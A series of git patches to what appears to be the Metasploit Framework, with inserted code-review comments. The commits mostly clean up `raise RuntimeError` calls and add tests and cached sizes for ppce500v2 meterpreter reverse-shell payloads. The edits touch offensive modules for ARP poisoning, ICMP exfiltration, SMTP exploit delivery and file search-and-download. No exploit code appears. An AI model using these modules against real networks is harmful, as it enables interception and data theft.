+ ['ppc', 'Linux', 'powerpc-linux-muslsf'],
+ ['ppce500v2', 'Linux', 'powerpc-e500v2-linux-musl'],
+ ['ppc64le', 'Linux', 'powerpc64le-linux-musl'],
+ ['x64', 'Linux', 'x86_64-linux-musl'],
+ ['x86', 'Linux', 'i486-linux-musl'],
+ ['zarch', 'Linux', 's390x-linux-musl'],
+ ['x64', 'OSX', 'x86_64-apple-darwin'],
 ]
 arch = ''
From f42b980cf02f5dc0f12610be84b267bae3e5e1c5 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Mon, 30 Oct 2017 15:42:11 -0500
Subject: [PATCH 071/254] fix misspelled RuntimeError
---
 lib/metasploit/framework/mssql/client.rb | 6 ++----
 lib/msf/core/auxiliary/nmap.rb | 2 +-
 2 files changed, 3 insertions(+), 5 deletions(-)
diff --git a/lib/metasploit/framework/mssql/client.rb b/lib/metasploit/framework/mssql/client.rb
index 4c79a8eb0e..9652c2ec79 100644
--- a/lib/metasploit/framework/mssql/client.rb
+++ b/lib/metasploit/framework/mssql/client.rb
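Review bot: Only `+ ['ppce500v2', 'Linux', 'powerpc-e500v2-linux-musl'],` is a functional change in this hunk; the other twelve replaced rows differ from their removed counterparts by column alignment alone, which buries the one real addition in blame and in review. A style point only: the realignment would be easier to audit as its own commit, or left out, so the hunk shows a single added row.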
@@ -634,8 +634,7 @@ module Metasploit
 if idx > 0
 encryption_mode = resp[idx, 1].unpack("C")[0]
 else
- raise RunTimeError, "Unable to parse encryption req. "\
- "from server during prelogin"
+ raise "Unable to parse encryption req during pre-login, this may not be a MSSQL server"
 encryption_mode = ENCRYPT_NOT_SUP
 end
@@ -682,8 +681,7 @@ module Metasploit
 if idx > 0
 encryption_mode = resp[idx, 1].unpack("C")[0]
 else
- raise RuntimeError, "Unable to parse encryption "\
- "req during pre-login"
+ raise "Unable to parse encryption req during pre-login, this may not be a MSSQL server"
 end
 end
 encryption_mode
diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb
index a966c8b1f1..0b434270c4 100644
--- a/lib/msf/core/auxiliary/nmap.rb
+++ b/lib/msf/core/auxiliary/nmap.rb
@@ -165,7 +165,7 @@ def nmap_add_ports
 if nmap_validate_arg(port_arg)
 self.nmap_args << port_arg
 else
- raise RunTimeError, "Argument is invalid"
+ raise "Argument is invalid"
 end
 end
From 9389052f612ef759754cdc3b3036b7da4a43a0b7 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Tue, 31 Oct 2017 04:45:19 -0500
Subject: [PATCH 072/254] fix more broken RuntimeError calls
---
 lib/msf/core/db_manager/report.rb | 6 +++---
 modules/auxiliary/scanner/discovery/arp_sweep.rb | 4 ++--
 modules/auxiliary/scanner/discovery/ipv6_neighbor.rb | 4 ++--
 .../scanner/discovery/ipv6_neighbor_router_advertisement.rb | 4 ++--
 modules/auxiliary/server/icmp_exfil.rb | 6 +++---
 modules/auxiliary/spoof/arp/arp_poisoning.rb | 6 +++---
 6 files changed, 15 insertions(+), 15 deletions(-)
diff --git a/lib/msf/core/db_manager/report.rb b/lib/msf/core/db_manager/report.rb
index cb4ccb19ce..e8f8c5fcc2 100644
--- a/lib/msf/core/db_manager/report.rb
+++ b/lib/msf/core/db_manager/report.rb
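Review bot: In the @@ -634 hunk the context line `encryption_mode = ENCRYPT_NOT_SUP` directly after the new `raise` is unreachable, so the else branch can never fall back to "encryption not supported" as that line suggests; either the raise or the fallback is the intended behaviour, not both. The @@ -682 hunk carries the same message with no fallback line, so after this commit the two pre-login parsers differ only by that dead assignment. I would either delete the dead line, or, if a graceful fallback for non-MSSQL responders is wanted, replace the raise with a logged fallback and keep the assignment, and make both branches agree. Both hunks sit inside methods whose start and end are outside the hunk.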
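Review bot: The new `raise "Argument is invalid"` in nmap_add_ports does not say which argument was rejected, so a user whose port list fails nmap_validate_arg only learns that something was wrong; `raise "Argument is invalid: #{port_arg.inspect}"` names it. port_arg appears to be built from datastore['RPORT'] and appended to the external nmap command line (visible in a later hunk of the same function), so this validation is the boundary between user-supplied text and the command invocation, and a precise rejection message makes that boundary auditable in logs. The enclosing nmap_add_ports starts outside the hunk.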
@@ -44,7 +44,7 @@ module Msf::DBManager::Report
 unless artifact.valid?
 errors = artifact.errors.full_messages.join('; ')
- raise RuntimeError "Artifact to be imported is not valid: #{errors}"
+ raise RuntimeError, "Artifact to be imported is not valid: #{errors}"
 end
 artifact.save
 end
@@ -66,7 +66,7 @@ module Msf::DBManager::Report
 unless report.valid?
 errors = report.errors.full_messages.join('; ')
- raise RuntimeError "Report to be imported is not valid: #{errors}"
+ raise RuntimeError, "Report to be imported is not valid: #{errors}"
 end
 report.state = :complete # Presume complete since it was exported
 report.save
@@ -83,4 +83,4 @@ module Msf::DBManager::Report
 wspace.reports
 }
 end
-end
\ No newline at end of file
+end
diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb
index 45993f560b..d5155e9080 100644
--- a/modules/auxiliary/scanner/discovery/arp_sweep.rb
+++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb
@@ -46,11 +46,11 @@ class MetasploitModule < Msf::Auxiliary
 @interface = datastore['INTERFACE'] || Pcap.lookupdev
 shost = datastore['SHOST']
 shost ||= get_ipv4_addr(@interface) if @netifaces
- raise RuntimeError ,'SHOST should be defined' unless shost
+ raise RuntimeError, 'SHOST should be defined' unless shost
 smac = datastore['SMAC']
 smac ||= get_mac(@interface) if @netifaces
- raise RuntimeError ,'SMAC should be defined' unless smac
+ raise RuntimeError, 'SMAC should be defined' unless smac
 begin
diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
index 00530de45c..169e2f8f06 100644
--- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
+++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
@@ -49,11 +49,11 @@ class MetasploitModule < Msf::Auxiliary
 @interface = datastore['INTERFACE'] || Pcap.lookupdev
 @shost = datastore['SHOST']
 @shost ||= get_ipv4_addr(@interface) if @netifaces
- raise RuntimeError ,'SHOST should be defined' unless @shost
+ raise RuntimeError, 'SHOST should be defined' unless @shost
 @smac = datastore['SMAC']
 @smac ||= get_mac(@interface) if @netifaces
- raise RuntimeError ,'SMAC should be defined' unless @smac
+ raise RuntimeError, 'SMAC should be defined' unless @smac
 addrs = []
diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb
index cbf01588c4..7651904f8f 100644
--- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb
+++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb
@@ -161,12 +161,12 @@ class MetasploitModule < Msf::Auxiliary
 @interface = datastore['INTERFACE'] || Pcap.lookupdev
 @shost = datastore['SHOST']
 @shost ||= get_ipv4_addr(@interface) if @netifaces
- raise RuntimeError ,'SHOST should be defined' unless @shost
+ raise RuntimeError, 'SHOST should be defined' unless @shost
 @smac = datastore['SMAC']
 @smac ||= get_mac(@interface) if @netifaces
 @smac ||= ipv6_mac
- raise RuntimeError ,'SMAC should be defined' unless @smac
+ raise RuntimeError, 'SMAC should be defined' unless @smac
 # Send router advertisement
 print_status("Sending router advertisement...")
diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb
index f51b978acc..a05fd7d2b9 100644
--- a/modules/auxiliary/server/icmp_exfil.rb
+++ b/modules/auxiliary/server/icmp_exfil.rb
@@ -153,7 +153,7 @@ class MetasploitModule < Msf::Auxiliary
 icmp_response, contents = icmp_packet(packet, datastore['RESP_START'])
 if not icmp_response
- raise RuntimeError ,"Could not build ICMP response"
+ raise RuntimeError, "Could not build ICMP response"
 else
 # send response packet icmp_pkt
 send_icmp(icmp_response, contents)
@@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary
 icmp_response, contents = icmp_packet(packet, datastore['RESP_END'])
 if not icmp_response
- raise RuntimeError , "Could not build ICMP response"
+ raise RuntimeError, "Could not build ICMP response"
 else
 # send response packet icmp_pkt
 send_icmp(icmp_response, contents)
@@ -192,7 +192,7 @@ class MetasploitModule < Msf::Auxiliary
 icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT'])
 if not icmp_response
- raise RuntimeError , "Could not build ICMP response"
+ raise RuntimeError, "Could not build ICMP response"
 else
 # send response packet icmp_pkt
 send_icmp(icmp_response, contents)
diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb
index d79ce44402..4a1022617a 100644
--- a/modules/auxiliary/spoof/arp/arp_poisoning.rb
+++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb
@@ -72,8 +72,8 @@ class MetasploitModule < Msf::Auxiliary
 @interface = get_interface_guid(@interface)
 @smac = datastore['SMAC']
 @smac ||= get_mac(@interface) if @netifaces
- raise RuntimeError ,'SMAC is not defined and can not be guessed' unless @smac
- raise RuntimeError ,'Source MAC is not in correct format' unless is_mac?(@smac)
+ raise RuntimeError, 'SMAC is not defined and can not be guessed' unless @smac
+ raise RuntimeError, 'Source MAC is not in correct format' unless is_mac?(@smac)
 @sip = datastore['LOCALSIP']
 @sip ||= get_ipv4_addr(@interface) if @netifaces
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary
 def arp_poisoning
 lsmac = datastore['LOCALSMAC'] || @smac
- raise RuntimeError ,'Local Source Mac is not in correct format' unless is_mac?(lsmac)
+ raise RuntimeError, 'Local Source Mac is not in correct format' unless is_mac?(lsmac)
 dhosts_range = Rex::Socket::RangeWalker.new(datastore['DHOSTS'])
 @dhosts = []
From aa0ac57238f6e4bef5571e5702eb8eec4f4dcbe0 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Tue, 31 Oct 2017 04:53:14 -0500
Subject: [PATCH 073/254] use implicit RuntimeError
---
 lib/msf/core/auxiliary/nmap.rb | 10 +++++-----
 lib/msf/core/db_manager/report.rb | 4 ++--
 modules/auxiliary/scanner/discovery/arp_sweep.rb | 4 ++--
 modules/auxiliary/scanner/discovery/ipv6_neighbor.rb | 4 ++--
 .../discovery/ipv6_neighbor_router_advertisement.rb | 4 ++--
 modules/auxiliary/server/icmp_exfil.rb | 6 +++---
 modules/auxiliary/spoof/arp/arp_poisoning.rb | 10 +++++-----
 7 files changed, 21 insertions(+), 21 deletions(-)
diff --git a/lib/msf/core/auxiliary/nmap.rb b/lib/msf/core/auxiliary/nmap.rb
index 0b434270c4..da69eccd6c 100644
--- a/lib/msf/core/auxiliary/nmap.rb
+++ b/lib/msf/core/auxiliary/nmap.rb
@@ -43,7 +43,7 @@ def rport
 end
 def set_nmap_cmd
- self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary")
+ self.nmap_bin || (raise "Cannot locate nmap binary")
 nmap_set_log
 nmap_add_ports
 nmap_cmd = [self.nmap_bin]
@@ -54,7 +54,7 @@ def set_nmap_cmd
 end
 def get_nmap_ver
- self.nmap_bin || (raise RuntimeError, "Cannot locate nmap binary")
+ self.nmap_bin || (raise "Cannot locate nmap binary")
 res = ""
 nmap_cmd = [self.nmap_bin]
 nmap_cmd << "--version"
@@ -84,7 +84,7 @@ def nmap_version_at_least?(test_ver=nil)
 end
 def nmap_build_args
- raise RuntimeError, "nmap_build_args() not defined by #{self.refname}"
+ raise "nmap_build_args() not defined by #{self.refname}"
 end
 def nmap_run
@@ -159,7 +159,7 @@ end
 # A helper to add in rport or rports as a -p argument
 def nmap_add_ports
 if not nmap_validate_rports
- raise RuntimeError, "Cannot continue without a valid port list."
+ raise "Cannot continue without a valid port list."
 end
 port_arg = "-p \"#{datastore['RPORT'] || rports}\""
 if nmap_validate_arg(port_arg)
@@ -237,7 +237,7 @@ end
 # module to ferret out whatever's interesting in this host
 # object.
 def nmap_hosts(&block)
- @nmap_bin || (raise RuntimeError, "Cannot locate the nmap binary.")
+ @nmap_bin || (raise "Cannot locate the nmap binary.")
 fh = self.nmap_log[0]
 nmap_data = fh.read(fh.stat.size)
 # fh.unlink
diff --git a/lib/msf/core/db_manager/report.rb b/lib/msf/core/db_manager/report.rb
index e8f8c5fcc2..45eada1df0 100644
--- a/lib/msf/core/db_manager/report.rb
+++ b/lib/msf/core/db_manager/report.rb
@@ -44,7 +44,7 @@ module Msf::DBManager::Report
 unless artifact.valid?
 errors = artifact.errors.full_messages.join('; ')
- raise RuntimeError, "Artifact to be imported is not valid: #{errors}"
+ raise "Artifact to be imported is not valid: #{errors}"
 end
 artifact.save
 end
@@ -66,7 +66,7 @@ module Msf::DBManager::Report
 unless report.valid?
 errors = report.errors.full_messages.join('; ')
- raise RuntimeError, "Report to be imported is not valid: #{errors}"
+ raise "Report to be imported is not valid: #{errors}"
 end
 report.state = :complete # Presume complete since it was exported
 report.save
diff --git a/modules/auxiliary/scanner/discovery/arp_sweep.rb b/modules/auxiliary/scanner/discovery/arp_sweep.rb
index d5155e9080..fa495b4333 100644
--- a/modules/auxiliary/scanner/discovery/arp_sweep.rb
+++ b/modules/auxiliary/scanner/discovery/arp_sweep.rb
@@ -46,11 +46,11 @@ class MetasploitModule < Msf::Auxiliary
 @interface = datastore['INTERFACE'] || Pcap.lookupdev
 shost = datastore['SHOST']
 shost ||= get_ipv4_addr(@interface) if @netifaces
- raise RuntimeError, 'SHOST should be defined' unless shost
+ raise 'SHOST should be defined' unless shost
 smac = datastore['SMAC']
 smac ||= get_mac(@interface) if @netifaces
- raise RuntimeError, 'SMAC should be defined' unless smac
+ raise 'SMAC should be defined' unless smac
 begin
diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
index 169e2f8f06..78f2491524 100644
--- a/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
+++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor.rb
@@ -49,11 +49,11 @@ class MetasploitModule < Msf::Auxiliary
 @interface = datastore['INTERFACE'] || Pcap.lookupdev
 @shost = datastore['SHOST']
 @shost ||= get_ipv4_addr(@interface) if @netifaces
- raise RuntimeError, 'SHOST should be defined' unless @shost
+ raise 'SHOST should be defined' unless @shost
 @smac = datastore['SMAC']
 @smac ||= get_mac(@interface) if @netifaces
- raise RuntimeError, 'SMAC should be defined' unless @smac
+ raise 'SMAC should be defined' unless @smac
 addrs = []
diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb
index 7651904f8f..747a276e7e 100644
--- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb
+++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb
@@ -161,12 +161,12 @@ class MetasploitModule < Msf::Auxiliary @interface = datastore['INTERFACE'] || Pcap.lookupdev @shost = datastore['SHOST'] @shost ||= get_ipv4_addr(@interface) if @netifaces - raise RuntimeError, 'SHOST should be defined' unless @shost + raise 'SHOST should be defined' unless @shost @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces @smac ||= ipv6_mac - raise RuntimeError, 'SMAC should be defined' unless @smac + raise 'SMAC should be defined' unless @smac # Send router advertisement print_status("Sending router advertisement...") diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index a05fd7d2b9..82c323aadd 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -153,7 +153,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_START']) if not icmp_response - raise RuntimeError, "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -172,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_END']) if not icmp_response - raise RuntimeError, "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) @@ -192,7 +192,7 @@ class MetasploitModule < Msf::Auxiliary icmp_response, contents = icmp_packet(packet, datastore['RESP_CONT']) if not icmp_response - raise RuntimeError, "Could not build ICMP response" + raise "Could not build ICMP response" else # send response packet icmp_pkt send_icmp(icmp_response, contents) diff --git a/modules/auxiliary/spoof/arp/arp_poisoning.rb b/modules/auxiliary/spoof/arp/arp_poisoning.rb index 4a1022617a..d326baacbf 100644 --- a/modules/auxiliary/spoof/arp/arp_poisoning.rb +++ b/modules/auxiliary/spoof/arp/arp_poisoning.rb 
@@ -72,8 +72,8 @@ class MetasploitModule < Msf::Auxiliary @interface = get_interface_guid(@interface) @smac = datastore['SMAC'] @smac ||= get_mac(@interface) if @netifaces - raise RuntimeError, 'SMAC is not defined and can not be guessed' unless @smac - raise RuntimeError, 'Source MAC is not in correct format' unless is_mac?(@smac) + raise 'SMAC is not defined and can not be guessed' unless @smac + raise 'Source MAC is not in correct format' unless is_mac?(@smac) @sip = datastore['LOCALSIP'] @sip ||= get_ipv4_addr(@interface) if @netifaces @@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary def arp_poisoning lsmac = datastore['LOCALSMAC'] || @smac - raise RuntimeError, 'Local Source Mac is not in correct format' unless is_mac?(lsmac) + raise 'Local Source Mac is not in correct format' unless is_mac?(lsmac) dhosts_range = Rex::Socket::RangeWalker.new(datastore['DHOSTS']) @dhosts = [] @@ -199,7 +199,7 @@ class MetasploitModule < Msf::Auxiliary end Kernel.select(nil, nil, nil, 0.50) end - raise RuntimeError, "No hosts found" unless @dsthosts_cache.length > 0 + raise "No hosts found" unless @dsthosts_cache.length > 0 # Build the local src hosts cache if datastore['BIDIRECTIONAL'] @@ -236,7 +236,7 @@ class MetasploitModule < Msf::Auxiliary end Kernel.select(nil, nil, nil, 0.50) end - raise RuntimeError, "No hosts found" unless @srchosts_cache.length > 0 + raise "No hosts found" unless @srchosts_cache.length > 0 end if datastore['AUTO_ADD'] From 1462330f349d7cebcf46294eb1dfafbc84a0cf2b Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 31 Oct 2017 20:33:31 -0400 Subject: [PATCH 074/254] Add tab completion to the payload generate command --- .../ui/console/command_dispatcher/payload.rb | 23 +++++++++++++++++-- 1 file changed, 21 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/payload.rb b/lib/msf/ui/console/command_dispatcher/payload.rb index 16e1e3f8b3..bab4065d70 100644 
--- a/lib/msf/ui/console/command_dispatcher/payload.rb +++ b/lib/msf/ui/console/command_dispatcher/payload.rb @@ -13,7 +13,7 @@ module Msf include Msf::Ui::Console::ModuleCommandDispatcher # Load supported formats - supported_formats = \ + @@supported_formats = \ Msf::Simple::Buffer.transform_formats + \ Msf::Util::EXE.to_executable_fmt_formats @@ -25,7 +25,7 @@ module Msf "-o" => [ true, "A comma separated list of options in VAR=VAL format." ], "-s" => [ true, "NOP sled length." ], "-f" => [ true, "The output file name (otherwise stdout)" ], - "-t" => [ true, "The output format: #{supported_formats.join(',')}" ], + "-t" => [ true, "The output format: #{@@supported_formats.join(',')}" ], "-p" => [ true, "The Platform for output." ], "-k" => [ false, "Keep the template executable functional" ], "-x" => [ true, "The executable template to use" ], @@ -151,6 +151,25 @@ module Msf end true end + + def cmd_generate_tabs(str, words) + last_word = words[-1] + fmt = @@generate_opts.fmt + fmt = fmt.select { |key, value| last_word == key || !words.include?(key) } + + option = fmt[last_word] + return fmt.keys if !option || !option[0] + + tabs = [] + case last_word + when '-e' + tabs = framework.encoders.map { |refname, mod| refname } + when '-f' + tabs = tab_complete_filenames(str, words) + when '-t' + tabs = @@supported_formats + end + end end end end From 90766ceceba52df84625ae93220273e2e15285b9 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 1 Nov 2017 05:59:12 -0500 Subject: [PATCH 075/254] remove more unusual raise RuntimeError patterns --- lib/msf/core/exploit/smtp_deliver.rb | 4 ++-- lib/msf/core/module/platform.rb | 3 +-- lib/msf/core/post/windows/ldap.rb | 6 +++--- lib/msf/core/post/windows/services.rb | 10 +++++----- lib/rex/ui/text/dispatcher_shell.rb | 2 +- scripts/meterpreter/search_dwld.rb | 4 ++-- 6 files changed, 14 insertions(+), 15 deletions(-) 
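Review bot: `cmd_generate_tabs` returns nil rather than an array whenever the last word is an argument-taking option other than `-e`, `-f` or `-t` (for example `-b` or `-o`), because the `case` expression is the method's final value and the `tabs = []` assignment is never returned; adding `tabs` as the last line before `end` fixes that. The `value` parameter in `fmt.select { |key, value| ... }` is unused and reads better as `_value`. `@@supported_formats` is a class variable, which is shared across the whole inheritance tree of the dispatcher; a frozen constant such as `SUPPORTED_FORMATS` or a class instance variable would avoid that.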
diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index 36c03bca7c..f91f3f5a09 100755 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -111,7 +111,7 @@ module Exploit::Remote::SMTPDeliver unless res[0..2] == '235' print_error("Authentication failed, quitting") disconnect(nsock) - raise RuntimeError.new 'Could not authenticate to SMTP server' + raise 'Could not authenticate to SMTP server' end else print_status("Server requested auth and no creds given, trying to continue anyway") @@ -126,7 +126,7 @@ module Exploit::Remote::SMTPDeliver unless res[0..2] == '235' print_error("Authentication failed, quitting") disconnect(nsock) - raise RuntimeError.new 'Could not authenticate to SMTP server' + raise 'Could not authenticate to SMTP server' end else print_status("Server requested auth and no creds given, trying to continue anyway") diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index 90f82c3bd5..de0e7fbaca 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -143,8 +143,7 @@ class Msf::Module::Platform if (not mod.const_defined?('Names')) elog("Failed to instantiate the platform list for module #{mod}") - raise RuntimeError.new("Failed to instantiate the platform list for module #{mod}") - return nil + raise "Failed to instantiate the platform list for module #{mod}" end abbrev = mod.const_get('Abbrev') diff --git a/lib/msf/core/post/windows/ldap.rb b/lib/msf/core/post/windows/ldap.rb index bcb756e232..466dd736d5 100644 --- a/lib/msf/core/post/windows/ldap.rb +++ b/lib/msf/core/post/windows/ldap.rb @@ -119,7 +119,7 @@ module LDAP domain ||= get_domain if domain.blank? - raise RuntimeError, "Unable to find the domain to query." + raise "Unable to find the domain to query." end if load_extapi 
@@ -338,7 +338,7 @@ module LDAP init_result = wldap32.ldap_sslinitA(domain, 389, 0) session_handle = init_result['return'] if session_handle == 0 - raise RuntimeError.new("Unable to initialize ldap server: #{init_result["ErrorMessage"]}") + raise "Unable to initialize ldap server: #{init_result["ErrorMessage"]}" end vprint_status("LDAP Handle: #{session_handle}") @@ -352,7 +352,7 @@ module LDAP bind = bind_result['return'] unless bind == 0 wldap32.ldap_unbind(session_handle) - raise RuntimeError.new("Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}") + raise "Unable to bind to ldap server: #{ERROR_CODE_TO_CONSTANT[bind]}" end if (block_given?) diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb index 6459c47479..3833fdfa37 100644 --- a/lib/msf/core/post/windows/services.rb +++ b/lib/msf/core/post/windows/services.rb @@ -78,7 +78,7 @@ module Services # ); manag = advapi32.OpenSCManagerA(machine_str,nil,access) if (manag["return"] == 0) - raise RuntimeError.new("Unable to open service manager: #{manag["ErrorMessage"]}") + raise "Unable to open service manager: #{manag["ErrorMessage"]}" end if (block_given?) @@ -115,7 +115,7 @@ module Services def open_service_handle(manager, name, access) handle = advapi32.OpenServiceA(manager, name, access) if (handle["return"] == 0) - raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}") + raise "Could not open service. OpenServiceA error: #{handle["ErrorMessage"]}" end if (block_given?) @@ -267,7 +267,7 @@ module Services when "manual" then startup_number = START_TYPE_MANUAL when "disable" then startup_number = START_TYPE_DISABLED else - raise RuntimeError, "Invalid Startup Mode: #{mode}" + raise "Invalid Startup Mode: #{mode}" end end 
@@ -453,7 +453,7 @@ module Services status = advapi32.QueryServiceStatus(service_handle,28) if (status["return"] == 0) - raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}") + raise "Could not query service. QueryServiceStatus error: #{status["ErrorMessage"]}" else ret = parse_service_status_struct(status['lpServiceStatus']) end @@ -485,7 +485,7 @@ module Services vprint_good("[#{name}] Service started") return true else - raise RuntimeError, status + raise status end rescue RuntimeError => s if tried diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb index 878010829c..1869156be7 100644 --- a/lib/rex/ui/text/dispatcher_shell.rb +++ b/lib/rex/ui/text/dispatcher_shell.rb @@ -464,7 +464,7 @@ module DispatcherShell inst = dispatcher.new(self) self.dispatcher_stack.each { |disp| if (disp.name == inst.name) - raise RuntimeError.new("Attempting to load already loaded dispatcher #{disp.name}") + raise "Attempting to load already loaded dispatcher #{disp.name}" end } self.dispatcher_stack.push(inst) diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb index bfdfe212ae..a51eed05bb 100644 --- a/scripts/meterpreter/search_dwld.rb +++ b/scripts/meterpreter/search_dwld.rb @@ -91,7 +91,7 @@ filter = args[1] || "office" # Set the regexp if filter == 'free' if args[2].nil? - raise RuntimeError.new("free filter requires pattern argument") + raise "free filter requires pattern argument" end $motif = args[2] else @@ -99,7 +99,7 @@ else end if $motif.nil? - raise RuntimeError.new("Unrecognized filter") + raise "Unrecognized filter" end # Search and download From cd114c90e0f84e12dd1d154280ff24610032167d Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 1 Nov 2017 11:52:06 -0500 Subject: [PATCH 076/254] remove no longer available bundler hack This address issue #9155 for bundler failures in TravisCI --- spec/spec_helper.rb | 4 ---- 1 file changed, 4 deletions(-) 
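Review bot: In the `@@ -485,7 +485,7 @@` hunk, `raise status` only works when `status` is a String or an exception object; `raise` with any other type fails with TypeError, whereas the old `raise RuntimeError, status` accepted anything convertible to a message. The type of `status` is not visible in this hunk, so if it can be anything other than a String, `raise status.to_s` preserves the previous behaviour and still reaches the `rescue RuntimeError => s` below. The enclosing method starts outside the hunk.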
diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb index 0859ab6424..a5b1cfc002 100644 --- a/spec/spec_helper.rb +++ b/spec/spec_helper.rb @@ -3,10 +3,6 @@ require 'stringio' ENV['RAILS_ENV'] = 'test' -unless Bundler.settings.without.include?(:coverage) - require 'simplecov' -end - # @note must be before loading config/environment because railtie needs to be loaded before # `Metasploit::Framework::Application.initialize!` is called. # From 553452c19d80b37020cac12d91d3ae9917064451 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 1 Nov 2017 12:00:03 -0500 Subject: [PATCH 077/254] add missing ppc500v2 payload specs --- spec/modules/payloads_spec.rb | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 0678c405ba..04eb3245c4 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb 
@@ -4384,6 +4384,36 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'linux/ppc/meterpreter_reverse_https' end + context 'linux/ppce500v2/meterpreter_reverse_http' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppce500v2/meterpreter_reverse_http' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppce500v2/meterpreter_reverse_http' + end + + context 'linux/ppce500v2/meterpreter_reverse_https' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppce500v2/meterpreter_reverse_https' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppce500v2/meterpreter_reverse_https' + end + + context 'linux/ppce500v2/meterpreter_reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/linux/ppce500v2/meterpreter_reverse_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'linux/ppce500v2/meterpreter_reverse_tcp' + end + context 'linux/ppc64le/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From 7a21cfdfa643046b23419b9eef544f9ca300d7cf Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 1 Nov 2017 13:08:15 -0500 Subject: [PATCH 078/254] add cached sizes for ppce500v2 --- .../singles/linux/ppce500v2/meterpreter_reverse_http.rb | 2 ++ .../singles/linux/ppce500v2/meterpreter_reverse_https.rb | 2 ++ .../payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb | 2 ++ 3 files changed, 6 insertions(+) diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb index 17a4ad60cc..a568253314 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb 
